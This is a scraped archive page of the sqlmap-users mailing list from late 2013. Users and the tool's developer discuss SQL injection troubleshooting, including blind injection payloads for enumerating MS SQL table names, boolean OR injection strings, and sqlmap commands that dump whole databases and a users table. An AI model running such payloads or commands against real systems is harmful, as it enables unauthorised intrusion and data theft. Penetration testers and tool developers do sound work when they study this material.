sqlmap-users Mailing List for sqlmap (Page 30)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Miroslav S. <mir...@gm...> - 2013-10-17 13:51:03
|
Hi Robert. In this kind of situations where "there are a number of filters confounding the effort, including certain character sequences, query length" we can't help you. sqlmap is an automated tool and automation is confronted to the wall in "special" situations. I would suggest you to automate that "process" you've successfully used in some kind of a custom script. Kind regards, Miroslav Stampar On Thu, Oct 17, 2013 at 12:56 AM, Robert Rich <rr...@gs...> wrote: > I’ve got a case where I’m trying to enumerate MS SQL table names, but > the user doesn’t have access to dbname..sysobjects. It does have access > to INFORMATION.SCHEMA though.**** > > ** ** > > The vulnerability is a blind SQL and there are a number of filters > confounding the effort, including certain character sequences, query > length, etc.**** > > ** ** > > I’ve got a process working manually along the lines of (from memory, may > not be 100%):**** > > ** ** > > VulnerableQueryParam=1550 AND (SELECT/**/COUNT(*) FROM INFORMATION.SCHEMA > AS XYZ WHERE TABLE_CATALOG=CHAR(103)<snip>CHAR(98) AND TABLE_NAME LIKE > [Test Case]) > 0**** > > ** ** > > Where [Test Case] is an iteration of**** > > ** ** > > CHAR(65)+CHAR(37) // A%**** > > CHAR(66)+CHAR(37) // B%**** > > CHAR(68)+CHAR(37) // C%**** > > ** ** > > I can tell by the output which are matching and which are not (elementary > stuff, basically). OF course, once the first character is found, I repeat > with known good characters at position 2:**** > > ** ** > > CHAR(103)+CHAR(65)+CHAR(37) // gA%**** > > CHAR(103)+CHAR(65)+CHAR(37) // gB%**** > > ** ** > > Is it possible for me to basically automate this with sqlmap? I can’t > seem to get it to find this query using its own process. I’d like to just > be able to put a ‘*’ or equivalent somewhere in the input URL to indicate > where it should insert the CHAR() values, and pass it a --not-string in > this case to distinguish true from false.**** > > ** ** > > Thanks for any input you can provide!**** > > ** ** > > Bob**** > > ** ** > > > ------------------------------------------------------------------------------ > October Webinars: Code for Performance > Free Intel webinars can help you accelerate application performance. > Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most > from > the latest Intel processors and coprocessors. See abstracts and register > > http://pubads.g.doubleclick.net/gampad/clk?id=60135031&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Marco M. <mm...@gm...> - 2013-10-17 09:44:24
|
Hi boys... I was thinking of an innovation, you can change that when sqlmap enumerates the users (especially those of mysql) if found in the character meets a "@" try the next automatically with "localhost"?? for save times? best regards Marco Mirandola 2013/5/12 Miroslav Stampar <mir...@gm...> > Hi Marcell. > > We can't include all those dependencies as it would make sqlmap package > even bigger than it's now. Also, direct connection feature is an "optional" > one. > > There could be (privilege?) complications with a PyMySQL setup. > > While you are not able to do the following command, you won't be able to > properly run "-d" against MySQL: > > python -c "import pymysql" > > Optionally, you can try to run: > python-sqlalchemy > > and rerun the -d... SQLAlchemy is an optional way how sqlmap handles > direct connections. > > Kind regards, > Miroslav Stampar > > > On Sun, May 12, 2013 at 9:53 AM, Marcell Fodor <fod...@gm...>wrote: > >> Heya, >> >> I needed direct access to mysql server and got error: >> [03:24:45] [CRITICAL] sqlmap requires 'python pymysql' third-party >> library in order to directly connect to the database MySQL. Download from ' >> https://github.com/petehunt/PyMySQL/' >> >> Now I got "This repository is temporarily unavailable." error and also >> tried to install like in this tutorial copy/pasted from web: >> >> Direct connection to the database >> -------------------------------------------------- >> >> Installing Py-MySQL Dependency >> >> git clone https://github.com/petehunt/PyMySQL/ >> cd PyMySQL >> python setup.py install >> cd .. >> rm -rf PyMySQL >> >> ./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10 >> >> First line fails. >> >> >> Would be great if this library was included in default install. >> >> Thanks in advance, >> >> Marcell >> >> >> >> ------------------------------------------------------------------------------ >> Learn Graph Databases - Download FREE O'Reilly Book >> "Graph Databases" is the definitive new guide to graph databases and >> their applications. This 200-page book is written by three acclaimed >> leaders in the field. The early access version is available now. >> Download your free book today! http://p.sf.net/sfu/neotech_d2d_may >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and > their applications. This 200-page book is written by three acclaimed > leaders in the field. The early access version is available now. > Download your free book today! http://p.sf.net/sfu/neotech_d2d_may > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Robert R. <rr...@gs...> - 2013-10-16 23:11:42
|
I've got a case where I'm trying to enumerate MS SQL table names, but the user doesn't have access to dbname..sysobjects. It does have access to INFORMATION.SCHEMA though. The vulnerability is a blind SQL and there are a number of filters confounding the effort, including certain character sequences, query length, etc. I've got a process working manually along the lines of (from memory, may not be 100%): VulnerableQueryParam=1550 AND (SELECT/**/COUNT(*) FROM INFORMATION.SCHEMA AS XYZ WHERE TABLE_CATALOG=CHAR(103)<snip>CHAR(98) AND TABLE_NAME LIKE [Test Case]) > 0 Where [Test Case] is an iteration of CHAR(65)+CHAR(37) // A% CHAR(66)+CHAR(37) // B% CHAR(68)+CHAR(37) // C% I can tell by the output which are matching and which are not (elementary stuff, basically). OF course, once the first character is found, I repeat with known good characters at position 2: CHAR(103)+CHAR(65)+CHAR(37) // gA% CHAR(103)+CHAR(65)+CHAR(37) // gB% Is it possible for me to basically automate this with sqlmap? I can't seem to get it to find this query using its own process. I'd like to just be able to put a '*' or equivalent somewhere in the input URL to indicate where it should insert the CHAR() values, and pass it a --not-string in this case to distinguish true from false. Thanks for any input you can provide! Bob |
|
From: Miroslav S. <mir...@gm...> - 2013-10-15 17:18:14
|
Hi. Sorry for the late reply. We are aware of the problem. It's the usage of HTML format in large dumps. We'll try to address it in next couple of days. Kind regards, Miroslav Stampar On Oct 11, 2013 3:04 PM, "lenny ginn" <cl...@gm...> wrote: > Hi , > > I got the bug when i try to dump a big data here : > i using sqlmapproject-sqlmap-0.9-3312-g369006c.zip download at > https://codeload.github.com/sqlmapproject/sqlmap/legacy.zip/master > > > sqlmap version: 1.0-dev > Python version: 2.7.5 > Operating system: nt > Command line: C:\Python27\sqlmap\sqlmap.py -u > ********************************** > ********************** --random-agent --threads=7 --text-only -v 3 --d > ump-format=html --dump-all > Technique: ERROR > Back-end DBMS: Microsoft SQL Server (fingerprinted) > Traceback (most recent call last): > File "C:\Python27\sqlmap\sqlmap.py", line 95, in main > start() > File "C:\Python27\sqlmap\lib\controller\controller.py", line 582, in > start > action() > File "C:\Python27\sqlmap\lib\controller\action.py", line 130, in action > conf.dbmsHandler.dumpAll() > File "C:\Python27\sqlmap\plugins\generic\entries.py", line 364, in > dumpAll > self.dumpTable() > File "C:\Python27\sqlmap\plugins\generic\entries.py", line 323, in > dumpTable > conf.dumper.dbTableValues(kb.data.dumpedTable) > File "C:\Python27\sqlmap\lib\core\dump.py", line 507, in dbTableValues > bodyNode.appendChild(rowNode) > File "C:\Python27\lib\xml\dom\minidom.py", line 125, in appendChild > _append_child(self, node) > File "C:\Python27\lib\xml\dom\minidom.py", line 282, in _append_child > childNodes.append(node) > MemoryError > > [*] shutting down at 12:39:23 > > Thanks you , i think problem is crash on memory setting > > > ------------------------------------------------------------------------------ > October Webinars: Code for Performance > Free Intel webinars can help you accelerate application performance. > Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most > from > the latest Intel processors and coprocessors. See abstracts and register > > http://pubads.g.doubleclick.net/gampad/clk?id=60134071&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Brandon P. <bpe...@gm...> - 2013-10-12 22:39:43
|
Sure thing, thanks a bunch!
On Sat, Oct 12, 2013 at 2:48 PM, Miroslav Stampar <
mir...@gm...> wrote:
> Hi Brandon.
>
> There is no such feature (at least for multipart cases).
>
> Nevertheless, I would suggest you to patch (just for this case):
>
> lib/request/connect.py (line 225):
> + post = post.replace("[RANDSTR]", randomStr()) if post else post
>
> Afterwards, you can put a [RANDSTR] mark into the request file itself at
> the place where you want a random value to be.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Fri, Oct 11, 2013 at 5:23 PM, Brandon Perry <bpe...@gm...>wrote:
>
>> Hi, I have a request that posts multi-part form data to the server, and
>> one of the params is vulnerable to a sqli. However, another param must
>> change each request (can be totally random) and I am not sure how to
>> approach that. I am sure that a tamper script or something will be the
>> correct solution, just not sure how to approach it.
>>
>> Any thoughts or questions in case I did not explain it well? Basically, I
>> would like to replcae this param with a random uuid or something each
>> request.
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>>
>> ------------------------------------------------------------------------------
>> October Webinars: Code for Performance
>> Free Intel webinars can help you accelerate application performance.
>> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most
>> from
>> the latest Intel processors and coprocessors. See abstracts and register >
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=60134071&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
|
|
From: Miroslav S. <mir...@gm...> - 2013-10-12 19:48:13
|
Hi Brandon.
There is no such feature (at least for multipart cases).
Nevertheless, I would suggest you to patch (just for this case):
lib/request/connect.py (line 225):
+ post = post.replace("[RANDSTR]", randomStr()) if post else post
Afterwards, you can put a [RANDSTR] mark into the request file itself at
the place where you want a random value to be.
Kind regards,
Miroslav Stampar
On Fri, Oct 11, 2013 at 5:23 PM, Brandon Perry <bpe...@gm...>wrote:
> Hi, I have a request that posts multi-part form data to the server, and
> one of the params is vulnerable to a sqli. However, another param must
> change each request (can be totally random) and I am not sure how to
> approach that. I am sure that a tamper script or something will be the
> correct solution, just not sure how to approach it.
>
> Any thoughts or questions in case I did not explain it well? Basically, I
> would like to replcae this param with a random uuid or something each
> request.
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
>
> ------------------------------------------------------------------------------
> October Webinars: Code for Performance
> Free Intel webinars can help you accelerate application performance.
> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most
> from
> the latest Intel processors and coprocessors. See abstracts and register >
> http://pubads.g.doubleclick.net/gampad/clk?id=60134071&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
|
|
From: Brandon P. <bpe...@gm...> - 2013-10-11 15:59:58
|
FWIW here is what was happening when I tried to use eval:
bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r ~/req2.req --level=3 -o
--eval="import uuid;Name=str(uuid.uuid1())"
sqlmap/1.0-dev-2dc570d - automatic SQL injection and database takeover
tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 08:58:56
[08:58:56] [INFO] parsing HTTP request from '/home/bperry/req2.req'
custom injection marking character ('*') found in option '--data'. Do you
want to process it? [Y/n/q] y
[08:58:59] [WARNING] you've provided target URL without any GET parameters
(e.g. www.site.com/article.php?id=1) and without providing any POST
parameters through --data option
do you want to try URI injections in the target URL itself? [Y/n/q] n
[08:59:00] [INFO] testing connection to the target URL
[08:59:00] [CRITICAL] an error occurred while evaluating provided code
('can't assign to operator (<string>, line 1)').
[*] shutting down at 08:59:00
bperry@ubuntu:~/tools/sqlmap$
On Fri, Oct 11, 2013 at 10:23 AM, Brandon Perry
<bpe...@gm...>wrote:
> Hi, I have a request that posts multi-part form data to the server, and
> one of the params is vulnerable to a sqli. However, another param must
> change each request (can be totally random) and I am not sure how to
> approach that. I am sure that a tamper script or something will be the
> correct solution, just not sure how to approach it.
>
> Any thoughts or questions in case I did not explain it well? Basically, I
> would like to replcae this param with a random uuid or something each
> request.
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
|
|
From: Brandon P. <bpe...@gm...> - 2013-10-11 15:23:49
|
Hi, I have a request that posts multi-part form data to the server, and one of the params is vulnerable to a sqli. However, another param must change each request (can be totally random) and I am not sure how to approach that. I am sure that a tamper script or something will be the correct solution, just not sure how to approach it. Any thoughts or questions in case I did not explain it well? Basically, I would like to replcae this param with a random uuid or something each request. -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: lenny g. <cl...@gm...> - 2013-10-10 19:57:40
|
Hi , I got the bug when i try to dump a big data here : i using sqlmapproject-sqlmap-0.9-3312-g369006c.zip download at https://codeload.github.com/sqlmapproject/sqlmap/legacy.zip/master sqlmap version: 1.0-dev Python version: 2.7.5 Operating system: nt Command line: C:\Python27\sqlmap\sqlmap.py -u ********************************** ********************** --random-agent --threads=7 --text-only -v 3 --d ump-format=html --dump-all Technique: ERROR Back-end DBMS: Microsoft SQL Server (fingerprinted) Traceback (most recent call last): File "C:\Python27\sqlmap\sqlmap.py", line 95, in main start() File "C:\Python27\sqlmap\lib\controller\controller.py", line 582, in start action() File "C:\Python27\sqlmap\lib\controller\action.py", line 130, in action conf.dbmsHandler.dumpAll() File "C:\Python27\sqlmap\plugins\generic\entries.py", line 364, in dumpAll self.dumpTable() File "C:\Python27\sqlmap\plugins\generic\entries.py", line 323, in dumpTable conf.dumper.dbTableValues(kb.data.dumpedTable) File "C:\Python27\sqlmap\lib\core\dump.py", line 507, in dbTableValues bodyNode.appendChild(rowNode) File "C:\Python27\lib\xml\dom\minidom.py", line 125, in appendChild _append_child(self, node) File "C:\Python27\lib\xml\dom\minidom.py", line 282, in _append_child childNodes.append(node) MemoryError [*] shutting down at 12:39:23 Thanks you , i think problem is crash on memory setting |
|
From: Miroslav S. <mir...@gm...> - 2013-10-04 09:09:56
|
On Fri, Oct 4, 2013 at 9:27 AM, Raphael GONZALEZ <rap...@gm...>wrote: > Hi, > > Thanks a lot. > Yes with * it's easier than with prefix/suffix > > ... but I'm not sure I was clear enough because my problem is still there > :) > > Here is my Request : > > POST target_url > ... > > param=&other_param=... > > > > if param > - is empty, > - or contains a number > - or contains a select sub-statement that returns a number > => returns 200 with other info > > if param > - contains a string > - or contains a select sub-statement that returns a string > => returns 302 to error page > > so using the * I still get some strange payload , for example > [PAYLOAD] -9402 OR (9544=9561) > > I think it comes from the "<where>2</where> in the payloads.xml file (for > OR boolean-based blind) > ... because if I add a test case with <where>1</where> then the generated > payload seems ok (and then the blind injection is detected) > Point of the whole OR payload is to generate an "invalid/negative/non-original" response and to combine it with a inference (... OR A=B). That <where>2</where> is there on purpose -> to generate invalid/negative values in case of OR payloads. > > I have also a second problem > when the response is 302, the error message is contained in the location > (and also in the body as a HREF), as very often with asp > (but if I follow the redirection the next page don't contains the message) > Have you tried without following the 302? sqlmap is asking you politely "do you want to follow". > => so it's not detected because of URL encoded, specially "+" character) > > I can turn around this by using a proxy and modifying the response before > it returns to sqlmap but it would be more convenient to do that in sqlmap. > Is there a way ? (for example and option similar to tamper to call a > function on the response before it is processed by sqlmap) > In cases like this when case is seems to be specific, we encourage users to modify sqlmap to suit their needs and/or use (also) other tools. > > Thanks again > Raphael > Bye > > > > > On Wed, Oct 2, 2013 at 10:18 PM, Miroslav Stampar < > mir...@gm...> wrote: > >> Hi. >> >> --prefix is a formation that is going in between of *value* and *payload* >> : >> >> ...=*value prefix payload*... >> >> This simply means that you've forgot for the complete *value* thing in >> your case. >> >> In your case usage of custom injection mark (*) is more appropriate: >> >> python sqlmap.py -u "www.target.com/vuln.php?param=(select name from >> sysusers where udi=-1 *)" >> >> Kind regards, >> Miroslav Stampar >> >> >> On Wed, Oct 2, 2013 at 2:29 PM, Raphael GONZALEZ <rap...@gm...>wrote: >> >>> Hi, >>> >>> sqlmap/1.0-dev-25eca9d >>> >>> I don't manage to get Sqlmap generating the good payload ! >>> >>> Here is my entry point : >>> (dbms = MSSQL) >>> >>> I got this with manual tries in burp : >>> >>> param value : (select name from sysusers where udi=-1) >>> - if the select returns no value => HTTP request returns 200 >>> - otherwise returns 302 to an error page >>> >>> so >>> with param value : (select name from sysusers where udi=-1 or 1=1) => >>> returns error >>> with param value : (select name from sysusers where udi=-1 or 1=2) => >>> returns 200 >>> >>> I thought I could make Sqlmap find a boolean based blind test with OR >>> statements >>> So I tried this command : >>> ./sqlmap.py -r myreq.txt -p param --level=3 --risk=3 --prefix="(select >>> name from sysusers where udi=-1 " --suffix=")" >>> >>> nothing is founded >>> but when I look at generated payloads, I get >>> [PAYLOAD] -9402(select name from sysusers where udi=-1 OR (9544=9561)) >>> >>> so I always get a number generated before my command >>> >>> Where am I wrong ? >>> >>> Thanks >>> >>> >>> >>> >>> ------------------------------------------------------------------------------ >>> October Webinars: Code for Performance >>> Free Intel webinars can help you accelerate application performance. >>> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most >>> from >>> the latest Intel processors and coprocessors. See abstracts and register >>> > >>> >>> http://pubads.g.doubleclick.net/gampad/clk?id=60134791&iu=/4140/ostg.clktrk >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Raphael G. <rap...@gm...> - 2013-10-04 07:27:47
|
Hi, Thanks a lot. Yes with * it's easier than with prefix/suffix ... but I'm not sure I was clear enough because my problem is still there :) Here is my Request : POST target_url ... param=&other_param=... if param - is empty, - or contains a number - or contains a select sub-statement that returns a number => returns 200 with other info if param - contains a string - or contains a select sub-statement that returns a string => returns 302 to error page so using the * I still get some strange payload , for example [PAYLOAD] -9402 OR (9544=9561) I think it comes from the "<where>2</where> in the payloads.xml file (for OR boolean-based blind) ... because if I add a test case with <where>1</where> then the generated payload seems ok (and then the blind injection is detected) I have also a second problem when the response is 302, the error message is contained in the location (and also in the body as a HREF), as very often with asp (but if I follow the redirection the next page don't contains the message) => so it's not detected because of URL encoded, specially "+" character) I can turn around this by using a proxy and modifying the response before it returns to sqlmap but it would be more convenient to do that in sqlmap. Is there a way ? (for example and option similar to tamper to call a function on the response before it is processed by sqlmap) Thanks again Raphael On Wed, Oct 2, 2013 at 10:18 PM, Miroslav Stampar < mir...@gm...> wrote: > Hi. > > --prefix is a formation that is going in between of *value* and *payload*: > > ...=*value prefix payload*... > > This simply means that you've forgot for the complete *value* thing in > your case. > > In your case usage of custom injection mark (*) is more appropriate: > > python sqlmap.py -u "www.target.com/vuln.php?param=(select name from > sysusers where udi=-1 *)" > > Kind regards, > Miroslav Stampar > > > On Wed, Oct 2, 2013 at 2:29 PM, Raphael GONZALEZ <rap...@gm...>wrote: > >> Hi, >> >> sqlmap/1.0-dev-25eca9d >> >> I don't manage to get Sqlmap generating the good payload ! >> >> Here is my entry point : >> (dbms = MSSQL) >> >> I got this with manual tries in burp : >> >> param value : (select name from sysusers where udi=-1) >> - if the select returns no value => HTTP request returns 200 >> - otherwise returns 302 to an error page >> >> so >> with param value : (select name from sysusers where udi=-1 or 1=1) => >> returns error >> with param value : (select name from sysusers where udi=-1 or 1=2) => >> returns 200 >> >> I thought I could make Sqlmap find a boolean based blind test with OR >> statements >> So I tried this command : >> ./sqlmap.py -r myreq.txt -p param --level=3 --risk=3 --prefix="(select >> name from sysusers where udi=-1 " --suffix=")" >> >> nothing is founded >> but when I look at generated payloads, I get >> [PAYLOAD] -9402(select name from sysusers where udi=-1 OR (9544=9561)) >> >> so I always get a number generated before my command >> >> Where am I wrong ? >> >> Thanks >> >> >> >> >> ------------------------------------------------------------------------------ >> October Webinars: Code for Performance >> Free Intel webinars can help you accelerate application performance. >> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most >> from >> the latest Intel processors and coprocessors. See abstracts and register > >> >> http://pubads.g.doubleclick.net/gampad/clk?id=60134791&iu=/4140/ostg.clktrk >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > |
|
From: Miroslav S. <mir...@gm...> - 2013-10-02 20:18:53
|
Hi. --prefix is a formation that is going in between of *value* and *payload*: ...=*value prefix payload*... This simply means that you've forgot for the complete *value* thing in your case. In your case usage of custom injection mark (*) is more appropriate: python sqlmap.py -u "www.target.com/vuln.php?param=(select name from sysusers where udi=-1 *)" Kind regards, Miroslav Stampar On Wed, Oct 2, 2013 at 2:29 PM, Raphael GONZALEZ <rap...@gm...>wrote: > Hi, > > sqlmap/1.0-dev-25eca9d > > I don't manage to get Sqlmap generating the good payload ! > > Here is my entry point : > (dbms = MSSQL) > > I got this with manual tries in burp : > > param value : (select name from sysusers where udi=-1) > - if the select returns no value => HTTP request returns 200 > - otherwise returns 302 to an error page > > so > with param value : (select name from sysusers where udi=-1 or 1=1) => > returns error > with param value : (select name from sysusers where udi=-1 or 1=2) => > returns 200 > > I thought I could make Sqlmap find a boolean based blind test with OR > statements > So I tried this command : > ./sqlmap.py -r myreq.txt -p param --level=3 --risk=3 --prefix="(select > name from sysusers where udi=-1 " --suffix=")" > > nothing is founded > but when I look at generated payloads, I get > [PAYLOAD] -9402(select name from sysusers where udi=-1 OR (9544=9561)) > > so I always get a number generated before my command > > Where am I wrong ? > > Thanks > > > > > ------------------------------------------------------------------------------ > October Webinars: Code for Performance > Free Intel webinars can help you accelerate application performance. > Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most > from > the latest Intel processors and coprocessors. See abstracts and register > > http://pubads.g.doubleclick.net/gampad/clk?id=60134791&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Raphael G. <rap...@gm...> - 2013-10-02 12:29:49
|
Hi, sqlmap/1.0-dev-25eca9d I don't manage to get Sqlmap generating the good payload ! Here is my entry point : (dbms = MSSQL) I got this with manual tries in burp : param value : (select name from sysusers where udi=-1) - if the select returns no value => HTTP request returns 200 - otherwise returns 302 to an error page so with param value : (select name from sysusers where udi=-1 or 1=1) => returns error with param value : (select name from sysusers where udi=-1 or 1=2) => returns 200 I thought I could make Sqlmap find a boolean based blind test with OR statements So I tried this command : ./sqlmap.py -r myreq.txt -p param --level=3 --risk=3 --prefix="(select name from sysusers where udi=-1 " --suffix=")" nothing is founded but when I look at generated payloads, I get [PAYLOAD] -9402(select name from sysusers where udi=-1 OR (9544=9561)) so I always get a number generated before my command Where am I wrong ? Thanks |
|
From: Miroslav S. <mir...@gm...> - 2013-09-24 20:11:53
|
Hi. Are you using the latest revision from our Github pages? There are two similar messages in the latest revision: 1) [WARNING] unknown web page charset '...'. Please report by email to ... 2) [ERROR] unknown charset '...'. Please visit ... but none of those is the same as yours. In case that the "message" is coming from the declared web page charset, and you said that the "meta" tag declared "iso-8859-1", there is a possibility that the problematic "it" is coming from the HTTP header "Content-type" (Content-type: ...charset=...). Just to be clear, that charset name is really invalid. In these kind of cases we usually do some kind of patching (translation of those typos), but "it" doesn't really have a good substitute. Also, that is just a warning message. Hence, sqlmap probably recognized a declared charset from mentioned meta tag afterwards. Kind regards, Miroslav Stampar On Thu, Sep 19, 2013 at 12:54 PM, dark sea <dar...@go...> wrote: > To whom it may concern. > > Hello there, today while I was testing a friend webpage I got the error: > [WARNING] unknown charset 'it' > > the meta tag of the site: > > <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> > > > Kind Regards, > > ds > > > ------------------------------------------------------------------------------ > LIMITED TIME SALE - Full Year of Microsoft Training For Just $49.99! > 1,500+ hours of tutorials including VisualStudio 2012, Windows 8, > SharePoint > 2013, SQL 2012, MVC 4, more. BEST VALUE: New Multi-Library Power Pack > includes > Mobile, Cloud, Java, and UX Design. Lowest price ever! Ends 9/20/13. > http://pubads.g.doubleclick.net/gampad/clk?id=58041151&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2013-09-23 18:59:23
|
Hi. You haven't included request.txt into your email. It would be of great help to see what was the content of it. I said that because this feature normally works out of the box. Kind regards, Miroslav Stampar On Mon, Sep 23, 2013 at 4:24 PM, Jacco van Tuijl <jac...@gm...>wrote: > request.txt is a http request from burp. I've added a star in the request > body because that is where the injection is. > when using "sqlmap.py -r request.txt" > No payload is injected into the request. > Also when using the -v 6 option it is not showing the [PAYLOAD] line e.g.: > [16:18:36] [PAYLOAD] ) AND 4129=1138 AND (5586=5586 > > > > ------------------------------------------------------------------------------ > LIMITED TIME SALE - Full Year of Microsoft Training For Just $49.99! > 1,500+ hours of tutorials including VisualStudio 2012, Windows 8, > SharePoint > 2013, SQL 2012, MVC 4, more. BEST VALUE: New Multi-Library Power Pack > includes > Mobile, Cloud, Java, and UX Design. Lowest price ever! Ends 9/20/13. > http://pubads.g.doubleclick.net/gampad/clk?id=58041151&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Jacco v. T. <jac...@gm...> - 2013-09-23 14:25:02
|
request.txt is a http request from burp. I've added a star in the request body because that is where the injection is. when using "sqlmap.py -r request.txt" No payload is injected into the request. Also when using the -v 6 option it is not showing the [PAYLOAD] line e.g.: [16:18:36] [PAYLOAD] ) AND 4129=1138 AND (5586=5586 |
|
From: Miroslav S. <mir...@gm...> - 2013-09-21 10:25:27
|
Hi. This should be fixed now. Bye On Sat, Sep 21, 2013 at 4:55 AM, 沸水浮冰 <sf...@gm...> wrote: > root@anonymous:~/sqlmap-0905# ./sqlmap.py -r file2 -p 'major' > --dbms=mssql --level=5 --risk=3 --tamper=base64encode -D vls3db4 -T > dbo.dd_users -C '最后登录时间' --dump --hex -v 3 > > sqlmap/1.0-dev-4cf49bc - automatic SQL injection and database takeover > tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state and federal laws. Developers assume no liability > and are not responsible for any misuse or damage caused by this program > > [*] starting at 00:51:25 > > [00:51:25] [INFO] parsing HTTP request from 'file2' > [00:51:25] [DEBUG] not a valid WebScarab log data > [00:51:25] [DEBUG] cleaning up configuration parameters > [00:51:25] [INFO] loading tamper script 'base64encode' > [00:51:25] [DEBUG] setting the HTTP timeout > [00:51:25] [DEBUG] setting the HTTP method to GET > [00:51:25] [DEBUG] creating HTTP requests opener object > [00:51:25] [DEBUG] forcing 